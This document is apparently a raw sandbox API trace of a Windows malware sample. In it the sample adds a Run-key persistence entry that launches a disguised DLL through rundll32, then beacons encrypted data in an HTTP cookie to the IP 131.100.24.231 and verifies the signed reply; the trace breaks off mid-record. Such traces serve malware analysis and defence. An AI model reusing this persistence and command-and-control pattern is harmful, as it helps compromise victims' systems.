[0522.044] BCryptFinishHash (in: hHash=0x2a7ac50, pbOutput=0x2cf510, cbOutput=0x20, dwFlags=0x0 | out: hHash=0x2a7ac50, pbOutput=0x2cf510) returned 0x0 [0522.044] BCryptDestroyHash (in: hHash=0x2a7ac50 | out: hHash=0x2a7ac50) returned 0x0 [0522.044] GetProcessHeap () returned 0x530000 [0522.044] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a7ac48 | out: hHeap=0x530000) returned 1 [0522.044] BCryptCloseAlgorithmProvider (in: hAlgorithm=0x5e0090, dwFlags=0x0 | out: hAlgorithm=0x5e0090) returned 0x0 [0522.044] BCryptVerifySignature (hKey=0x584858, pPaddingInfo=0x0, pbHash=0x2cf510, cbHash=0x20, pbSignature=0x58bdfc, cbSignature=0x40, dwFlags=0x0) returned 0x0 [0522.046] GetProcessHeap () returned 0x530000 [0522.046] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x8) returned 0x2a6c6c0 [0522.046] GetProcessHeap () returned 0x530000 [0522.046] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x58bdf8 | out: hHeap=0x530000) returned 1 [0522.046] GetProcessHeap () returned 0x530000 [0522.047] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2b47e00 | out: hHeap=0x530000) returned 1 [0522.047] GetProcessHeap () returned 0x530000 [0522.047] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x5d0230 | out: hHeap=0x530000) returned 1 [0522.047] GetProcessHeap () returned 0x530000 [0522.048] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x5d8258 | out: hHeap=0x530000) returned 1 [0522.048] GetProcessHeap () returned 0x530000 [0522.048] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x530000) returned 1 [0522.048] SHGetFolderPathW (in: hwnd=0x0, csidl=41, hToken=0x0, dwFlags=0x0, pszPath=0x2cf5d4 | out: pszPath="C:\\Windows\\SysWOW64") returned 0x0 [0522.048] GetProcessHeap () returned 0x530000 [0522.048] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x38) returned 0x2a83be0 [0522.048] _snwprintf (in: _Dest=0x2cf1c4, _Count=0x104, _Format="%s\\rundll32.exe \"%s\\%s\",%s" | out: _Dest="C:\\Windows\\SysWOW64\\rundll32.exe \"C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\tfnfdhfu.kqr\",YoyG") returned 94 [0522.048] GetProcessHeap () returned 0x530000 [0522.048] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a83be0 | out: hHeap=0x530000) returned 1 [0522.048] GetProcessHeap () returned 0x530000 [0522.048] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x60) returned 0x58bdf8 [0522.048] RegCreateKeyExW (in: hKey=0x80000001, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x2cf1b0, lpdwDisposition=0x0 | out: phkResult=0x2cf1b0*=0x670, lpdwDisposition=0x0) returned 0x0 [0522.049] GetProcessHeap () returned 0x530000 [0522.049] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x58bdf8 | out: hHeap=0x530000) returned 1 [0522.049] lstrlenW (lpString="C:\\Windows\\SysWOW64\\rundll32.exe \"C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\tfnfdhfu.kqr\",YoyG") returned 94 [0522.049] RegSetValueExW (in: hKey=0x670, lpValueName="tfnfdhfu.kqr", Reserved=0x0, dwType=0x1, lpData="C:\\Windows\\SysWOW64\\rundll32.exe \"C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\tfnfdhfu.kqr\",YoyG", cbData=0xbe | out: lpData="C:\\Windows\\SysWOW64\\rundll32.exe \"C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\tfnfdhfu.kqr\",YoyG") returned 0x0 [0522.050] RegCloseKey (hKey=0x670) returned 0x0 [0522.050] GetProcessHeap () returned 0x530000 [0522.050] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a6c6c0 | out: hHeap=0x530000) returned 1 [0522.050] GetProcessHeap () returned 0x530000 [0522.050] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2aceb70 | out: hHeap=0x530000) returned 1 [0522.050] WaitForSingleObject (hHandle=0x1a8, dwMilliseconds=0xe7564) returned 0x102 [0532.097] GetProcessHeap () returned 0x530000 [0532.098] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x10) returned 0x2bd7140 [0532.098] _snwprintf (in: _Dest=0x2cf5d0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\tfnfdhfu.kqr") returned 54 [0532.098] GetProcessHeap () returned 0x530000 [0532.098] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2bd7140 | out: hHeap=0x530000) returned 1 [0532.098] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\tfnfdhfu.kqr") returned="tfnfdhfu.kqr" [0532.098] GetProcessHeap () returned 0x530000 [0532.098] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x10) returned 0x2bd7140 [0532.098] _snwprintf (in: _Dest=0x2cf040, _Count=0x104, _Format="%s\\*" | out: _Dest="C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\\\*") returned 44 [0532.098] GetProcessHeap () returned 0x530000 [0532.098] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2bd7140 | out: hHeap=0x530000) returned 1 [0532.098] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\\\*", lpFindFileData=0x2cf248 | out: lpFindFileData=0x2cf248*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7de3c200, ftCreationTime.dwHighDateTime=0x1d806e7, ftLastAccessTime.dwLowDateTime=0x841515c0, ftLastAccessTime.dwHighDateTime=0x1d806e7, ftLastWriteTime.dwLowDateTime=0x841515c0, ftLastWriteTime.dwHighDateTime=0x1d806e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6b002e, dwReserved1=0x720071, cFileName=".", cAlternateFileName="")) returned 0x2a83be0 [0532.101] FindNextFileW (in: hFindFile=0x2a83be0, lpFindFileData=0x2cf248 | out: lpFindFileData=0x2cf248*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7de3c200, ftCreationTime.dwHighDateTime=0x1d806e7, ftLastAccessTime.dwLowDateTime=0x841515c0, ftLastAccessTime.dwHighDateTime=0x1d806e7, ftLastWriteTime.dwLowDateTime=0x841515c0, ftLastWriteTime.dwHighDateTime=0x1d806e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6b002e, dwReserved1=0x720071, cFileName="..", cAlternateFileName="")) returned 1 [0532.101] FindNextFileW (in: hFindFile=0x2a83be0, lpFindFileData=0x2cf248 | out: lpFindFileData=0x2cf248*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6a27bcb0, ftCreationTime.dwHighDateTime=0x1d80167, ftLastAccessTime.dwLowDateTime=0x6a27bcb0, ftLastAccessTime.dwHighDateTime=0x1d80167, ftLastWriteTime.dwLowDateTime=0x6a27bcb0, ftLastWriteTime.dwHighDateTime=0x1d80167, nFileSizeHigh=0x0, nFileSizeLow=0x67627, dwReserved0=0x6b002e, dwReserved1=0x720071, cFileName="tfnfdhfu.kqr", cAlternateFileName="")) returned 1 [0532.101] PathFindFileNameW (pszPath="Oxeedtbi\\tfnfdhfu.kqr") returned="tfnfdhfu.kqr" [0532.101] lstrcmpiW (lpString1="tfnfdhfu.kqr", lpString2="tfnfdhfu.kqr") returned 0 [0532.101] FindNextFileW (in: hFindFile=0x2a83be0, lpFindFileData=0x2cf248 | out: lpFindFileData=0x2cf248*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6a27bcb0, ftCreationTime.dwHighDateTime=0x1d80167, ftLastAccessTime.dwLowDateTime=0x6a27bcb0, ftLastAccessTime.dwHighDateTime=0x1d80167, ftLastWriteTime.dwLowDateTime=0x6a27bcb0, ftLastWriteTime.dwHighDateTime=0x1d80167, nFileSizeHigh=0x0, nFileSizeLow=0x67627, dwReserved0=0x6b002e, dwReserved1=0x720071, cFileName="tfnfdhfu.kqr", cAlternateFileName="")) returned 0 [0532.101] FindClose (in: hFindFile=0x2a83be0 | out: hFindFile=0x2a83be0) returned 1 [0532.102] GetProcessHeap () returned 0x530000 [0532.102] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x2f) returned 0x2aceb70 [0532.102] GetProcessHeap () returned 0x530000 [0532.102] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x10) returned 0x2bd7140 [0532.102] GetProcessHeap () returned 0x530000 [0532.102] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x40) returned 0x5cd2a0 [0532.102] BCryptOpenAlgorithmProvider (in: phAlgorithm=0x2cf4b0, pszAlgId="SHA256", pszImplementation="Microsoft Primitive Provider", dwFlags=0x0 | out: phAlgorithm=0x2cf4b0) returned 0x0 [0532.105] GetProcessHeap () returned 0x530000 [0532.105] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2bd7140 | out: hHeap=0x530000) returned 1 [0532.105] GetProcessHeap () returned 0x530000 [0532.105] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x5cd2a0 | out: hHeap=0x530000) returned 1 [0532.105] GetProcessHeap () returned 0x530000 [0532.105] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x20) returned 0x2b62ea0 [0532.105] BCryptGetProperty (in: hObject=0x5e0090, pszProperty="ObjectLength", pbOutput=0x2cf4b8, cbOutput=0x4, pcbResult=0x2cf4bc, dwFlags=0x0 | out: pbOutput=0x2cf4b8, pcbResult=0x2cf4bc) returned 0x0 [0532.105] GetProcessHeap () returned 0x530000 [0532.106] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2b62ea0 | out: hHeap=0x530000) returned 1 [0532.106] GetProcessHeap () returned 0x530000 [0532.106] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0xb2) returned 0x2a7ac48 [0532.106] BCryptCreateHash (in: hAlgorithm=0x5e0090, phHash=0x2cf4ac, pbHashObject=0x2a7ac48, cbHashObject=0xb2, pbSecret=0x0, cbSecret=0x0, dwFlags=0x0 | out: hAlgorithm=0x5e0090, phHash=0x2cf4ac, pbHashObject=0x2a7ac48) returned 0x0 [0532.106] BCryptHashData (in: hHash=0x2a7ac50, pbInput=0x2aceb70, cbInput=0x2f, dwFlags=0x0 | out: hHash=0x2a7ac50) returned 0x0 [0532.106] BCryptFinishHash (in: hHash=0x2a7ac50, pbOutput=0x2cf5e0, cbOutput=0x20, dwFlags=0x0 | out: hHash=0x2a7ac50, pbOutput=0x2cf5e0) returned 0x0 [0532.106] BCryptDestroyHash (in: hHash=0x2a7ac50 | out: hHash=0x2a7ac50) returned 0x0 [0532.106] GetProcessHeap () returned 0x530000 [0532.106] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a7ac48 | out: hHeap=0x530000) returned 1 [0532.106] BCryptCloseAlgorithmProvider (in: hAlgorithm=0x5e0090, dwFlags=0x0 | out: hAlgorithm=0x5e0090) returned 0x0 [0532.106] GetProcessHeap () returned 0x530000 [0532.106] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x5b) returned 0x58bdf8 [0532.106] BCryptEncrypt (in: hKey=0x5bd870, pbInput=0x58bdf8, cbInput=0x5b, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x0, cbOutput=0x0, pcbResult=0x2cf4b4, dwFlags=0x1 | out: hKey=0x5bd870, pbIV=0x0, pbOutput=0x0, pcbResult=0x2cf4b4) returned 0x0 [0532.106] GetProcessHeap () returned 0x530000 [0532.106] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x60) returned 0x2a76420 [0532.107] BCryptEncrypt (in: hKey=0x5bd870, pbInput=0x58bdf8, cbInput=0x5b, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2a76420, cbOutput=0x60, pcbResult=0x2cf4b4, dwFlags=0x1 | out: hKey=0x5bd870, pbIV=0x0, pbOutput=0x2a76420, pcbResult=0x2cf4b4) returned 0x0 [0532.107] GetProcessHeap () returned 0x530000 [0532.107] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0xd3) returned 0x2996ac0 [0532.107] GetProcessHeap () returned 0x530000 [0532.107] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a76420 | out: hHeap=0x530000) returned 1 [0532.107] GetProcessHeap () returned 0x530000 [0532.107] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x58bdf8 | out: hHeap=0x530000) returned 1 [0532.107] CryptBinaryToStringW (in: pbBinary=0x2996ac0, cbBinary=0xd3, dwFlags=0x40000001, pszString=0x0, pcchString=0x2cf504 | out: pszString=0x0, pcchString=0x2cf504) returned 1 [0532.108] GetProcessHeap () returned 0x530000 [0532.108] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x23a) returned 0x5edef0 [0532.108] CryptBinaryToStringW (in: pbBinary=0x2996ac0, cbBinary=0xd3, dwFlags=0x40000001, pszString=0x5edef0, pcchString=0x2cf504 | out: pszString="jpijciwkfNog0jBnpMeLgO4ddKQRChWwS/CghvzNUdlSzanoSXKnnchMOOaq2v87GxSZfVpSwCRHu3guy3wl65/pR9BBd1IoccMjKCJr7VK4xPslYCkvoY+O8IpnQSuV34IO2MUZMXUBv54TSONlcT9FWO2CvbWl/9K+XkVttZ3ojYuz2Z/3uUexP5/9Xt6QoO9xu00EQBYC5CuVMIePToPFqksK3wAj1S8mFHyq8iJbHR+jzNhbq6+2IhgTbE14JRqNcNSAl+r9u15PsNci2r53zA==", pcchString=0x2cf504) returned 1 [0532.108] GetProcessHeap () returned 0x530000 [0532.108] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x4000) returned 0x5d8258 [0532.108] GetProcessHeap () returned 0x530000 [0532.108] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x20) returned 0x2b630d0 [0532.108] _snwprintf (in: _Dest=0x5d8258, _Count=0x4000, _Format="Cookie: %s=%s\r\n" | out: _Dest="Cookie: oPgHsTGHxI=jpijciwkfNog0jBnpMeLgO4ddKQRChWwS/CghvzNUdlSzanoSXKnnchMOOaq2v87GxSZfVpSwCRHu3guy3wl65/pR9BBd1IoccMjKCJr7VK4xPslYCkvoY+O8IpnQSuV34IO2MUZMXUBv54TSONlcT9FWO2CvbWl/9K+XkVttZ3ojYuz2Z/3uUexP5/9Xt6QoO9xu00EQBYC5CuVMIePToPFqksK3wAj1S8mFHyq8iJbHR+jzNhbq6+2IhgTbE14JRqNcNSAl+r9u15PsNci2r53zA==\r\n") returned 305 [0532.108] GetProcessHeap () returned 0x530000 [0532.108] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2b630d0 | out: hHeap=0x530000) returned 1 [0532.108] GetProcessHeap () returned 0x530000 [0532.108] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x5edef0 | out: hHeap=0x530000) returned 1 [0532.109] InternetOpenW (lpszAgent=0x0, dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0532.109] GetProcessHeap () returned 0x530000 [0532.109] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x530000) returned 1 [0532.109] InternetConnectW (hInternet=0xcc0004, lpszServerName="131.100.24.231", nServerPort=0x50, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc0008 [0532.111] HttpOpenRequestW (hConnect=0xcc0008, lpszVerb=0x0, lpszObjectName="XUhtMukWyxGCOUtlOamIMpz", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x84ccf300, dwContext=0x0) returned 0xcc000c [0532.111] GetProcessHeap () returned 0x530000 [0532.111] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x530000) returned 1 [0532.111] InternetSetOptionW (hInternet=0xcc000c, dwOption=0x41, lpBuffer=0x2cf5b8*, dwBufferLength=0x4) returned 1 [0532.112] InternetQueryOptionW (in: hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0x2cf5b8, lpdwBufferLength=0x2cf5d8 | out: lpBuffer=0x2cf5b8, lpdwBufferLength=0x2cf5d8) returned 1 [0532.112] InternetSetOptionW (hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0x2cf5b8*, dwBufferLength=0x4) returned 1 [0532.112] HttpSendRequestW (hRequest=0xcc000c, lpszHeaders="Cookie: oPgHsTGHxI=jpijciwkfNog0jBnpMeLgO4ddKQRChWwS/CghvzNUdlSzanoSXKnnchMOOaq2v87GxSZfVpSwCRHu3guy3wl65/pR9BBd1IoccMjKCJr7VK4xPslYCkvoY+O8IpnQSuV34IO2MUZMXUBv54TSONlcT9FWO2CvbWl/9K+XkVttZ3ojYuz2Z/3uUexP5/9Xt6QoO9xu00EQBYC5CuVMIePToPFqksK3wAj1S8mFHyq8iJbHR+jzNhbq6+2IhgTbE14JRqNcNSAl+r9u15PsNci2r53zA==\r\n", dwHeadersLength=0xffffffff, lpOptional=0x0*, dwOptionalLength=0x0) returned 1 [0533.413] HttpQueryInfoW (in: hRequest=0xcc000c, dwInfoLevel=0x20000013, lpBuffer=0x2cf490, lpdwBufferLength=0x2cf494, lpdwIndex=0x0 | out: lpBuffer=0x2cf490*, lpdwBufferLength=0x2cf494*=0x4, lpdwIndex=0x0) returned 1 [0533.413] GetProcessHeap () returned 0x530000 [0533.413] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x10000) returned 0x2b47e00 [0533.413] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2b47e00, dwNumberOfBytesToRead=0x10000, lpdwNumberOfBytesRead=0x2cf49c | out: lpBuffer=0x2b47e00*, lpdwNumberOfBytesRead=0x2cf49c*=0x21f) returned 1 [0533.413] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2b4801f, dwNumberOfBytesToRead=0xfde1, lpdwNumberOfBytesRead=0x2cf49c | out: lpBuffer=0x2b4801f*, lpdwNumberOfBytesRead=0x2cf49c*=0x0) returned 1 [0533.414] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0533.414] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0533.414] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0533.414] BCryptDecrypt (in: hKey=0x5bd870, pbInput=0x2b47e00, cbInput=0x60, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x0, cbOutput=0x0, pcbResult=0x2cf51c, dwFlags=0x1 | out: hKey=0x5bd870, pbIV=0x0, pbOutput=0x0, pcbResult=0x2cf51c) returned 0x0 [0533.414] GetProcessHeap () returned 0x530000 [0533.414] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x60) returned 0x58bdf8 [0533.414] BCryptDecrypt (in: hKey=0x5bd870, pbInput=0x2b47e00, cbInput=0x60, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x58bdf8, cbOutput=0x60, pcbResult=0x2cf51c, dwFlags=0x1 | out: hKey=0x5bd870, pbIV=0x0, pbOutput=0x58bdf8, pcbResult=0x2cf51c) returned 0x0 [0533.414] GetProcessHeap () returned 0x530000 [0533.414] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x10) returned 0x2bd7110 [0533.414] GetProcessHeap () returned 0x530000 [0533.414] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x40) returned 0x5cd2a0 [0533.414] BCryptOpenAlgorithmProvider (in: phAlgorithm=0x2cf498, pszAlgId="SHA256", pszImplementation="Microsoft Primitive Provider", dwFlags=0x0 | out: phAlgorithm=0x2cf498) returned 0x0 [0533.415] GetProcessHeap () returned 0x530000 [0533.415] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2bd7110 | out: hHeap=0x530000) returned 1 [0533.415] GetProcessHeap () returned 0x530000 [0533.415] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x5cd2a0 | out: hHeap=0x530000) returned 1 [0533.415] GetProcessHeap () returned 0x530000 [0533.415] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x20) returned 0x2b62f18 [0533.415] BCryptGetProperty (in: hObject=0x5e0090, pszProperty="ObjectLength", pbOutput=0x2cf4a0, cbOutput=0x4, pcbResult=0x2cf4a4, dwFlags=0x0 | out: pbOutput=0x2cf4a0, pcbResult=0x2cf4a4) returned 0x0 [0533.415] GetProcessHeap () returned 0x530000 [0533.415] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2b62f18 | out: hHeap=0x530000) returned 1 [0533.415] GetProcessHeap () returned 0x530000 [0533.415] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0xb2) returned 0x2a7ac48 [0533.415] BCryptCreateHash (in: hAlgorithm=0x5e0090, phHash=0x2cf494, pbHashObject=0x2a7ac48, cbHashObject=0xb2, pbSecret=0x0, cbSecret=0x0, dwFlags=0x0 | out: hAlgorithm=0x5e0090, phHash=0x2cf494, pbHashObject=0x2a7ac48) returned 0x0 [0533.416] BCryptHashData (in: hHash=0x2a7ac50, pbInput=0x58be40, cbInput=0x8, dwFlags=0x0 | out: hHash=0x2a7ac50) returned 0x0 [0533.416] BCryptFinishHash (in: hHash=0x2a7ac50, pbOutput=0x2cf510, cbOutput=0x20, dwFlags=0x0 | out: hHash=0x2a7ac50, pbOutput=0x2cf510) returned 0x0 [0533.416] BCryptDestroyHash (in: hHash=0x2a7ac50 | out: hHash=0x2a7ac50) returned 0x0 [0533.416] GetProcessHeap () returned 0x530000 [0533.416] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a7ac48 | out: hHeap=0x530000) returned 1 [0533.416] BCryptCloseAlgorithmProvider (in: hAlgorithm=0x5e0090, dwFlags=0x0 | out: hAlgorithm=0x5e0090) returned 0x0 [0533.416] BCryptVerifySignature (hKey=0x584858, pPaddingInfo=0x0, pbHash=0x2cf510, cbHash=0x20, pbSignature=0x58bdfc, cbSignature=0x40, dwFlags=0x0) returned 0x0 [0533.418] GetProcessHeap () returned 0x530000 [0533.418] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x8) returned 0x2a6c650 [0533.418] GetProcessHeap () returned 0x530000 [0533.418] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x58bdf8 | out: hHeap=0x530000) returned 1 [0533.418] GetProcessHeap () returned 0x530000 [0533.419] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2b47e00 | out: hHeap=0x530000) returned 1 [0533.419] GetProcessHeap () returned 0x530000 [0533.419] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2996ac0 | out: hHeap=0x530000) returned 1 [0533.419] GetProcessHeap () returned 0x530000 [0533.419] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x5d8258 | out: hHeap=0x530000) returned 1 [0533.419] GetProcessHeap () returned 0x530000 [0533.419] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x530000) returned 1 [0533.420] SHGetFolderPathW (in: hwnd=0x0, csidl=41, hToken=0x0, dwFlags=0x0, pszPath=0x2cf5d4 | out: pszPath="C:\\Windows\\SysWOW64") returned 0x0 [0533.420] GetProcessHeap () returned 0x530000 [0533.420] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x38) returned 0x2a83b20 [0533.420] _snwprintf (in: _Dest=0x2cf1c4, _Count=0x104, _Format="%s\\rundll32.exe \"%s\\%s\",%s" | out: _Dest="C:\\Windows\\SysWOW64\\rundll32.exe \"C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\tfnfdhfu.kqr\",deetjmuoWFdgpwS") returned 105 [0533.420] GetProcessHeap () returned 0x530000 [0533.420] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a83b20 | out: hHeap=0x530000) returned 1 [0533.420] GetProcessHeap () returned 0x530000 [0533.420] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x60) returned 0x58bdf8 [0533.420] RegCreateKeyExW (in: hKey=0x80000001, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x2cf1b0, lpdwDisposition=0x0 | out: phkResult=0x2cf1b0*=0x670, lpdwDisposition=0x0) returned 0x0 [0533.421] GetProcessHeap () returned 0x530000 [0533.421] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x58bdf8 | out: hHeap=0x530000) returned 1 [0533.421] lstrlenW (lpString="C:\\Windows\\SysWOW64\\rundll32.exe \"C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\tfnfdhfu.kqr\",deetjmuoWFdgpwS") returned 105 [0533.421] RegSetValueExW (in: hKey=0x670, lpValueName="tfnfdhfu.kqr", Reserved=0x0, dwType=0x1, lpData="C:\\Windows\\SysWOW64\\rundll32.exe \"C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\tfnfdhfu.kqr\",deetjmuoWFdgpwS", cbData=0xd4 | out: lpData="C:\\Windows\\SysWOW64\\rundll32.exe \"C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\tfnfdhfu.kqr\",deetjmuoWFdgpwS") returned 0x0 [0533.422] RegCloseKey (hKey=0x670) returned 0x0 [0533.422] GetProcessHeap () returned 0x530000 [0533.422] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a6c650 | out: hHeap=0x530000) returned 1 [0533.422] GetProcessHeap () returned 0x530000 [0533.422] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2aceb70 | out: hHeap=0x530000) returned 1 [0533.423] WaitForSingleObject (hHandle=0x1a8, dwMilliseconds=0xdc477) returned 0x102 [0543.430] GetProcessHeap () returned 0x530000 [0543.430] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x10) returned 0x2bd7110 [0543.430] _snwprintf (in: _Dest=0x2cf5d0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\tfnfdhfu.kqr") returned 54 [0543.430] GetProcessHeap () returned 0x530000 [0543.430] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2bd7110 | out: hHeap=0x530000) returned 1 [0543.431] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\tfnfdhfu.kqr") returned="tfnfdhfu.kqr" [0543.431] GetProcessHeap () returned 0x530000 [0543.431] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x10) returned 0x2bd7110 [0543.431] _snwprintf (in: _Dest=0x2cf040, _Count=0x104, _Format="%s\\*" | out: _Dest="C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\\\*") returned 44 [0543.431] GetProcessHeap () returned 0x530000 [0543.431] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2bd7110 | out: hHeap=0x530000) returned 1 [0543.431] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\\\*", lpFindFileData=0x2cf248 | out: lpFindFileData=0x2cf248*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7de3c200, ftCreationTime.dwHighDateTime=0x1d806e7, ftLastAccessTime.dwLowDateTime=0x841515c0, ftLastAccessTime.dwHighDateTime=0x1d806e7, ftLastWriteTime.dwLowDateTime=0x841515c0, ftLastWriteTime.dwHighDateTime=0x1d806e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6b002e, dwReserved1=0x720071, cFileName=".", cAlternateFileName="")) returned 0x2a83b20 [0543.433] FindNextFileW (in: hFindFile=0x2a83b20, lpFindFileData=0x2cf248 | out: lpFindFileData=0x2cf248*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7de3c200, ftCreationTime.dwHighDateTime=0x1d806e7, ftLastAccessTime.dwLowDateTime=0x841515c0, ftLastAccessTime.dwHighDateTime=0x1d806e7, ftLastWriteTime.dwLowDateTime=0x841515c0, ftLastWriteTime.dwHighDateTime=0x1d806e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6b002e, dwReserved1=0x720071, cFileName="..", cAlternateFileName="")) returned 1 [0543.433] FindNextFileW (in: hFindFile=0x2a83b20, lpFindFileData=0x2cf248 | out: lpFindFileData=0x2cf248*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6a27bcb0, ftCreationTime.dwHighDateTime=0x1d80167, ftLastAccessTime.dwLowDateTime=0x6a27bcb0, ftLastAccessTime.dwHighDateTime=0x1d80167, ftLastWriteTime.dwLowDateTime=0x6a27bcb0, 